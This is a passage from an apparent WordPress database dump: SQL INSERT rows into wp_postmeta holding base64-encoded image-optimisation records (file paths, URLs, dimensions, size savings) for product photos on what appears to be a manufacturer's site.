xvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxOTY1LCJpZCI6MTM5NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE5NjgsImlkIjoxMzk1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNjcsInRpbWUiOjE0ODM1NzE5NzAsImlkIjoxMzk1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMjgsInRpbWUiOjE0ODM1NzE5NzMsImlkIjoxMzk1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo3MCwidGltZSI6MTQ4MzU3MTk3NiwiaWQiOjEzOTV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzE5NzgsImlkIjoxMzk1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxOTgxLCJpZCI6MTM5NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTI0MmwtcXVpay1mcmVlemUtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yNDJsLXF1aWstZnJlZXplLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjQybC1xdWlrLWZyZWV6ZS00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTk4NCwiaWQiOjEzOTV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29555, 1394, 'wpfc_optimisation_reduction', '2193087'); 
INSERT INTO `wp_postmeta` VALUES (29556, 1394, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXIuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXIuanBnIiwicmVkdWN0aW9uIjoyMTkyNjIwLCJ0aW1lIjoxNDgzNTcxOTk1LCJpZCI6IjEzOTQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTk5OCwiaWQiOjEzOTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMDAxLCJpZCI6MTM5NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIwMDQsImlkIjoxMzk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMDA3LCJpZCI6MTM5NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIwMTAsImlkIjoxMzk0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjAxMywiaWQiOjEzOTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMDE1LCJpZCI6MTM5NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIwMTgsImlkIjoxMzk0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoyMDksInRpbWUiOjE0ODM1NzIwMjEsImlkIjoxMzk0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMTIsInRpbWUiOjE0ODM1NzIwMjMsImlkIjoxMzk0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMzUsInRpbWUiOjE0ODM1NzIwMjYsImlkIjoxMzk0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMDI5LCJpZCI6MTM5NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjAzMSwiaWQiOjEzOTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yMjJuLWFlcm8tZHVzdGVyLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybi1hZXJvLWR1c3Rlci00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTIyMm4tYWVyby1kdXN0ZXItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzIwMzQsImlkIjoxMzk0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29557, 1393, 'wpfc_optimisation_reduction', '2149804'); 
INSERT INTO `wp_postmeta` VALUES (29558, 1393, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybC1hZXJvLWR1c3Rlci5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMmwtYWVyby1kdXN0ZXIuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTIyMmwtYWVyby1kdXN0ZXIuanBnIiwicmVkdWN0aW9uIjoyMTQ5NDI1LCJ0aW1lIjoxNDgzNTcyMDQ1LCJpZCI6IjEzOTMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMmwtYWVyby1kdXN0ZXItMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yMjJsLWFlcm8tZHVzdGVyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtMjIybC1hZXJvLWR1c3Rlci0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MjA0OCwiaWQiOjEzOTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybC1hZXJvLWR1c3Rlci04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTIyMmwtYWVyby1kdXN0ZXItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy0yMjJsLWFlcm8tZHVzdGVyLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcyMDUxLCJpZCI6MTM5M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy0yMjJsLWFlcm8tZHVzdGVyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtMjIybC1hZXJvLWR1c3Rlci03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVn